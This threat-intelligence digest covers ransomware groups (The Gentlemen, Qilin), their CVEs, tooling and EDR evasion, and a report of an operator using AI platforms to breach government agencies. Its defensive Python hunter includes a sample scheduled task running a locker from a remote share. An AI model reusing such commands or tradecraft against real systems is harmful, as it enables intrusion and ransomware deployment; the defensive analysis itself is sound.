Check Point Research's March-April 2026 AI Threat Landscape Digest (published 2026-05-22) is the operationally most striking annual / periodic AI report of the past month. The centrepiece — researched by Gambit Security and summarised in the Check Point post — documents a single unidentified operator compromising nine Mexican government agencies between December 2025 and February 2026, covering tax records, civil registry, patient files and electoral infrastructure. The structural innovation: the attacker ran two commercial AI platforms in parallel — one managing live exploitation and issuing >5,000 AI-executed commands, a second processing harvested data and feeding instructions back into the first. Persistence for the AI itself was simple: modifying the AI client's startup configuration file to embed persistent instructions inherited by every subsequent session.

Two further findings have direct EU/CH public-sector implications. First, the EvilTokens platform — a commercial jailbreak-as-a-service tool packaging AI-driven phishing generation, financial-data extraction and similar capabilities as a subscription — represents the same commoditisation curve as Kali365 (§ 1) but for AI-assisted intrusion. Second, CPR explicitly calls out that stolen API keys for Anthropic, OpenAI, Groq and Mistral are now high-value criminal targets, since they grant access to powerful AI services without an account; Swiss federal and cantonal agencies using commercial AI APIs should treat key rotation cadence and source-IP scoping (Conditional Access on the API layer) on par with classic privileged-credential hygiene. Detection vantage: bulk exfiltration events temporally co-located with anomalous API call patterns to commercial AI services from non-standard processes; process trees in which AI client libraries spawn data-collection subprocesses; cloud audit logs showing API key issuance followed immediately by large-volume inference calls from unusual source IPs.

UPDATE: TheGentlemen RaaS lists Czech university and Swiss engineering firm on leak site

From CTI Daily Brief — 2026-05-20 · published 2026-05-20

UPDATE (originally covered 2026-05-14 backend database leak analysis): The TheGentlemen RaaS group's leak site listed two new European victims this week: University of Finance and Administration (VSFS, vsfs.cz) in the Czech Republic on 2026-05-19 and Swiss engineering firm DEVO-Tech AG (devo-tech.ch, Ziefen / BL) on 2026-05-18. The DeXpose write-ups are aggregator coverage of the leak-site listings themselves; neither victim has publicly confirmed the breach as of this brief. TTPs, infrastructure, and the Go-based locker remain unchanged from the Check Point Research deep coverage of 2026-05-14 — the new data point is geographic spread continuing into EU higher education and Swiss SMB engineering.

Higher-education and public-sector defenders in the DACH region should confirm offline-backup integrity and revisit SD-WAN / VPN gateway patch posture (the primary initial-access vectors documented for TheGentlemen in prior reporting). Listings are not victim confirmation: both organisations were named by TheGentlemen, not by the victims themselves.

Check Point Research March–April 2026 AI Threat Landscape Digest — operator-run AI platforms breach government agencies [SINGLE-SOURCE]

From CTI Weekly Summary — 2026-W21 (May 18 – May 24, 2026) · published 2026-05-18

Check Point's AI Threat Landscape Digest (published 2026-05-22, covered 2026-05-23) documents a single operator running two AI platforms in parallel to breach nine Mexican government agencies — the most concrete public example yet of AI tooling operationalised for end-to-end intrusion rather than reconnaissance assistance. Single-source (Check Point only); the synthesis relevant to this audience is the trajectory, not the victim count: where the Verizon and Rapid7 reports show AI compressing the exploitation timeline, this shows AI compressing the operator skill floor — fewer skilled humans needed per campaign. Treat as a directional indicator pending independent corroboration.

Check Point April 2026 ransomware analysis — Qilin leads at 15%, Germany at 5% of global victims

From CTI Weekly Summary — 2026-W20 (May 11 – May 17, 2026) · published 2026-05-17

Check Point's April 2026 monthly threat report (published early May 2026) confirms Qilin / Agenda leading all ransomware operators with 15% of 707 published attacks in April; Germany is the third-most-targeted country globally at 5.0% of victims (US 41.6%); Europe accounts for 27% of ransomware victims globally. Sector targeting in April 2026: Business Services (33.8%), healthcare, manufacturing. The Gentlemen — despite the May 4 backend breach — remained in the top-7 operators with 320+ victims (Check Point Research, 2026-05-08). The synthesis the dailies did not yet absorb: Germany's 5% share of global ransomware victims is materially elevated compared to the 2024–2025 baseline (~2–3%); the Qilin DLS lists 65 German victims total as of 2026-05-16 (Check Point blog, dataset reference). For Swiss defenders: CH-DE cross-border operations (Swiss subsidiaries in DE, German subsidiaries of Swiss parents) inherit the German exposure level; this is the empirical basis for a DACH-region threat-modelling premium on ransomware-readiness exercises.

"The Gentlemen" RaaS — operations continue post-leak, decryptor published, FortiOS / Erlang SSH initial access CVEs confirmed

From CTI Weekly Summary — 2026-W20 (May 11 – May 17, 2026) · published 2026-05-17

Following the 2026-05-04 Rocket backend DB leak (attributed to a breach of hosting provider 4VPS), administrator zeta88 / hastalamuerte announced a full communications-infrastructure overhaul — new NAS deployment and new locker upgrades — signalling no intent to cease operations. The operation maintained ~332 victims in H1 2026, ranking second in global RaaS activity per Check Point Research. Check Point documented initial access via CVE-2024-55591 (FortiOS management interface auth bypass, ITW since November 2024) and CVE-2025-32433 (Erlang SSH in Cisco context); post-access chain includes RelayKing-based NTLM relay (CVE-2025-33073), AD enumeration, EDR disablement, and GPO-deployed locker (Check Point Research; Check Point blog; daily 2026-05-14 UPDATE).

Bedrock Safeguard (Canadian security firm) published a working decryptor on 2026-05-14 exploiting Go's failure to zero XChaCha20 / X25519 ephemeral private-key material from goroutine stacks post-use; 35/35 files decrypted in testing. The operator claims to have patched the binary, so the decryptor capability is best-case retrospective; affiliates show no evidence of forking, and the core nine-person structure remains intact per leaked chats (Bedrock Safeguard decryptor). Defender takeaway: for any Gentlemen-impacted Go-binary host, attempt process-memory dump capture for ephemeral key recovery before reimaging; verify FortiOS patch state on CVE-2024-55591 across every Swiss / EU public-sector Fortinet deployment (the FortiOS bug is the documented initial-access primary, and the W19 long-running record already lists this CVE).

Qilin / Agenda RaaS — April 2026 lead at 15% of global ransomware activity, Germany 5% of global victims

From CTI Weekly Summary — 2026-W20 (May 11 – May 17, 2026) · published 2026-05-17 · view item permalink →

W19 long-running record (item:qilin-agenda-raas-die-linke-confirms-q2-2026-german-activity) tracked Qilin's continued German activity. W20 status: Check Point's April 2026 report confirms Qilin leads all RaaS operators at 15% of 707 published attacks in April; Germany's share at 5% of global ransomware victims is the elevated-DACH-exposure data point (Qilin DLS German-victim count cited by W1 horizon research as approximately 65 as of 2026-05-16 — uncorroborated leak-site enumeration that should be treated as a lower bound); Die Linke (German political party) confirmed Qilin compromise in March 2026 (W19 carry-over); no new Swiss-specific victim named in window (Check Point Research).

UPDATE: The Gentlemen RaaS — backend "Rocket" database leaked (16.22 GB), Check Point analysis exposes operator handles, ZeroPulse C2 internals, 1,570+ victims, decryptor published on GitHub

From CTI Daily Brief — 2026-05-14 · published 2026-05-14 · view item permalink →

UPDATE (originally covered 2026-05-10 in the Q1 2026 ransomware quarterly synthesis): Check Point Research published "Thus Spoke…The Gentlemen" on 2026-05-13, a detailed analysis of a 44.4 MB extract from the group's leaked "Rocket" backend database (16.22 GB total) that was posted to the cybercrime forum Breached on 2026-05-04 after the group's infrastructure was compromised by an unidentified actor (Check Point Research, 2026-05-13; BankInfoSecurity, 2026-05-11). The dataset contains 8,200 lines of internal chat-tool traffic across channels INFO / general / TOOLS / PODBOR, shadow files with password hashes, affiliate negotiation transcripts, and configuration artefacts for the ZeroPulse C2 framework.

Nine operator handles are identified — including administrator zeta88 (also hastalamuerte), who both manages the RaaS panel and participates directly in encryption events. Reconstructed attack chain: initial access almost exclusively via unpatched edge devices — FortiGate CVE-2024-55591 (the group's documented mainstay), Cisco appliances, CWMP/TR-069 interfaces — or purchased infostealer credentials; post-access tooling includes NetExec, RelayKing (NTLM relay), CertiHound (AD Certificate Services abuse), TaskHound, PrivHound; EDR-suppression utilities EDRStartupHinder, gfreeze and glinker manipulate ETW callbacks and NTDLL syscall tables; persistence is maintained via Cloudflare Zero Trust tunnels and self-provisioned WireGuard/OpenVPN chains.

Two operationally critical facts: (1) Check Point Research attributes a count of 1,570+ victim entries to a separately-exposed SystemBC C&C server, against 332 victims publicly listed on the group's data-leak site in the first five months of 2026 — significant under-reporting of true scope (Check Point's wider comparison cites 412 cumulative DLS listings); (2) the decryptor has been released as GitHub Bedrock-Safeguard/gentlemen-decryptor, enabling existing victims to recover without payment (decryptor disclosed in BankInfoSecurity's 2026-05-11 reporting). For Swiss / EU SOCs handling an active Gentlemen incident the workflow changes today: attempt decryption before any negotiation. Detection pivots from the leak: alert on EDRStartupHinder, gfreeze, glinker process names (custom binaries, not commodity); monitor for AD Certificate Services reconnaissance (certutil enumeration of CA servers and templates) consistent with CertiHound; correlate with FortiGate CVE-2024-55591 initial-access exploitation patterns that the group continues to weaponise.

The Gentlemen RaaS — Europe-skewed operation surged approximately 448% QoQ; 32% of Q1 2026 victims in Europe; FortiGate CVE-2024-55591 initial-access funnel

From CTI Weekly Summary — 2026-W19 (May 04 – May 10, 2026) · published 2026-05-11 · view item permalink →

W1 horizon research identified an in-window operator gap the daily briefs missed. "The Gentlemen" emerged in August 2025 and per ZeroFox surged to the second- or third-most-active ransomware operation globally in Q1 2026 — 192 attacks that quarter, an approximately 448% QoQ increase, 32% of Q1 2026 victims in Europe (up from 2% in Q4 2025) (ZeroFox Q1 2026 Wrap-Up, 2026-04-17). Check Point Research's DFIR report on the operator confirms the post-compromise tradecraft observed during a single incident-response engagement: Cobalt Strike delivered via RPC from a Domain Controller; Mimikatz for credential harvesting; GPO abuse to inject a scheduled task into Group Policy that propagates the encryptor to all domain-joined systems near-simultaneously (compressing time-to-encryption to minimise the IR response window); SystemBC SOCKS5 C2 tunnelling and covert payload staging; encryption using X25519 Diffie–Hellman key exchange per file combined with the XChaCha20 stream cipher, with a per-file ephemeral key pair whose private key is a random 32-byte value (Check Point Research DFIR Report, 2026-04-20 · BleepingComputer — The Gentlemen + SystemBC, 2026-04-20). CPR explicitly states the precise initial-access vector could not be conclusively determined for the engagement it analysed; broader reporting attributes initial access to a FortiOS / FortiProxy attack surface that includes CVE-2024-55591 (authentication bypass, CVSS 9.8 — patched January 2025), with secondary reporting describing an operator database of pre-exploited devices and brute-forced VPN credentials primed for deployment — defenders should treat current patch state alone as insufficient if the device was unpatched against CVE-2024-55591 at any point during the exposure window.
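Why the process-memory recovery route described for the Bedrock Safeguard decryptor (W20 item above) works against the per-file X25519 + XChaCha20 scheme described here, as an added example that is not Check Point's, Bedrock Safeguard's or the operator's code: the per-file key is derived from a DH shared secret, which the operator reproduces from its private key and the stored ephemeral public key, and which a victim can equally reproduce from a recovered ephemeral private key and the operator's embedded public key. Assumptions: SHA-256 over the shared secret stands in for the locker's undisclosed KDF, the XChaCha20 step itself is omitted, and the X25519 ladder is a pure-Python RFC 7748 transcription for portability, not a constant-time implementation.

```python
import hashlib
import os

P = 2**255 - 19                         # Curve25519 field prime
A24 = 121665                            # (486662 - 2) / 4
BASEPOINT = (9).to_bytes(32, "little")

def _clamp(k: bytes) -> int:
    k = bytearray(k)
    k[0] &= 248
    k[31] = (k[31] & 127) | 64
    return int.from_bytes(k, "little")

def x25519(scalar: bytes, u: bytes) -> bytes:
    """RFC 7748 Montgomery ladder over 32-byte little-endian inputs (pure Python, not constant-time)."""
    k, x1 = _clamp(scalar), (int.from_bytes(u, "little") & (2**255 - 1)) % P
    x2, z2, x3, z3, swap = 1, 0, x1, 1, 0
    for t in range(254, -1, -1):
        kt = (k >> t) & 1
        if swap ^ kt:                       # conditional swap step of the ladder
            x2, x3, z2, z3 = x3, x2, z3, z2
        swap = kt
        a, b = (x2 + z2) % P, (x2 - z2) % P
        aa, bb = a * a % P, b * b % P
        e = (aa - bb) % P
        c, d = (x3 + z3) % P, (x3 - z3) % P
        da, cb = d * a % P, c * b % P
        x3, z3 = pow(da + cb, 2, P), x1 * pow(da - cb, 2, P) % P
        x2, z2 = aa * bb % P, e * (aa + A24 * e) % P
    if swap:
        x2, z2 = x3, z3
    return (x2 * pow(z2, P - 2, P) % P).to_bytes(32, "little")

def locker_file_key(operator_pub: bytes) -> tuple:
    """Encrypting side: fresh random 32-byte ephemeral private key per file, DH against the
    operator's embedded public key, SHA-256 as a stand-in KDF (assumption) for the XChaCha20 key."""
    eph_priv = os.urandom(32)
    eph_pub = x25519(eph_priv, BASEPOINT)   # stored with the file so the operator can derive the key
    return eph_priv, eph_pub, hashlib.sha256(x25519(eph_priv, operator_pub)).digest()

def operator_file_key(operator_priv: bytes, eph_pub: bytes) -> bytes:
    """Operator's decryptor path: its own private key plus the stored ephemeral public key."""
    return hashlib.sha256(x25519(operator_priv, eph_pub)).digest()

def recovered_file_key(eph_priv_from_dump: bytes, operator_pub: bytes) -> bytes:
    """Victim-side path: an ephemeral private key carved from a process dump (the material the
    report says Go left unzeroed) yields the same key without any operator secret."""
    return hashlib.sha256(x25519(eph_priv_from_dump, operator_pub)).digest()
```

Any maintained X25519 implementation can replace the ladder; the recovery property depends only on DH symmetry, which is why per-file ephemeral keys must be wiped promptly in a correct implementation and why a dump taken before reimaging is worth keeping.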

European victims surfaced in BleepingComputer's SystemBC coverage and in quarterly leak-site aggregation include Oltenia Energy Complex (Romania — described as a significant portion of national electricity supply, December 2025) and The Adaptavist Group; Comparitech's Q1 2026 healthcare roundup attributes 10 healthcare-sector claims to the operator in the quarter; the operator's leak-site footprint and the absence of an "off-limits" sector convention make hospitals, water utilities, and similar critical-infrastructure targets in-scope. The cross-finding with this week's other concerns: GPO-injected scheduled-task propagation defeats backup-isolation defences if the AD environment is in the encryption path; if the operator's initial-access funnel includes unpatched FortiGate devices, that surface intersects directly with the Polish water-OT NIS2 coverage-gap framing (§ 4, § 6) since small municipal CI operators are over-represented in the unpatched-FortiGate population. Defender priorities for 2026-W20: hunt scheduled tasks in SYSVOL pointing to UNC paths or temp directories; profile SystemBC SOCKS5 beacons; add XChaCha20 file-header pattern detection at backup / DLP tier; re-verify FortiGate patch state against CVE-2024-55591 and any later FortiOS / FortiProxy auth-bypass advisories.
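A hunt for the GPO scheduled-task propagation above, as an added example rather than Check Point's or any published tooling: it parses the ScheduledTasks.xml that Group Policy Preferences stores in SYSVOL and flags Exec actions whose command or arguments run from a UNC path outside the domain's own shares or from a temp directory. The sample XML is constructed (task names, host and paths are made up), and treating only the domain's SYSVOL and NETLOGON shares as trusted is an assumption to tune per environment.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample in the Group Policy Preferences ScheduledTasks.xml layout, as found under
# SYSVOL\<domain>\Policies\<GUID>\Machine\Preferences\ScheduledTasks\ (names and paths are made up).
SAMPLE_XML = r"""<ScheduledTasks>
  <TaskV2 name="InventoryAgent"><Properties action="C" name="InventoryAgent" runAs="NT AUTHORITY\System">
    <Task version="1.2"><Actions Context="Author"><Exec>
      <Command>\\corp.example\SYSVOL\corp.example\scripts\inventory.exe</Command><Arguments>/quiet</Arguments>
    </Exec></Actions></Task></Properties></TaskV2>
  <TaskV2 name="WindowsUpdateCheck"><Properties action="C" name="WindowsUpdateCheck" runAs="NT AUTHORITY\System">
    <Task version="1.2"><Actions Context="Author"><Exec>
      <Command>cmd.exe</Command><Arguments>/c \\10.0.0.7\share\locker.exe</Arguments>
    </Exec></Actions></Task></Properties></TaskV2>
  <TaskV2 name="Cleanup"><Properties action="C" name="Cleanup" runAs="NT AUTHORITY\System">
    <Task version="1.2"><Actions Context="Author"><Exec>
      <Command>C:\Windows\Temp\svc.exe</Command>
    </Exec></Actions></Task></Properties></TaskV2>
</ScheduledTasks>"""

UNC_RE = re.compile(r"\\\\[^\\\s]+\\[^\\\s]+")              # \\host\share
TEMP_RE = re.compile(r"%te?mp%|\\te?mp\\", re.IGNORECASE)  # %TEMP%, %TMP%, \Temp\, \Tmp\


def suspicious_tasks(xml_text: str, domain: str) -> list:
    """Return (task name, reason, command line) for every Exec action whose command or
    arguments reference a UNC path outside the domain's own SYSVOL/NETLOGON shares,
    or a temp directory. `domain` is the AD DNS name whose shares are treated as trusted."""
    trusted = tuple(f"\\\\{domain}\\{share}".lower() for share in ("sysvol", "netlogon"))
    hits = []
    for task in ET.fromstring(xml_text).iter("TaskV2"):
        for action in task.iter("Exec"):
            cmd = (action.findtext("Command") or "").strip()
            args = (action.findtext("Arguments") or "").strip()   # payload is often hidden here
            line = f"{cmd} {args}".strip()
            for unc in UNC_RE.findall(line):
                if not unc.lower().startswith(trusted):
                    hits.append((task.get("name"), "non-SYSVOL UNC path", line))
            if TEMP_RE.search(line):
                hits.append((task.get("name"), "temp directory", line))
    return hits


if __name__ == "__main__":
    for name, reason, line in suspicious_tasks(SAMPLE_XML, "corp.example"):
        print(f"[{reason}] task {name!r}: {line}")
```

Run it over every ScheduledTasks.xml under a mounted or backed-up SYSVOL and diff the results against the previous pass; a newly appearing hit is the signal, since legitimate GPP tasks rarely change.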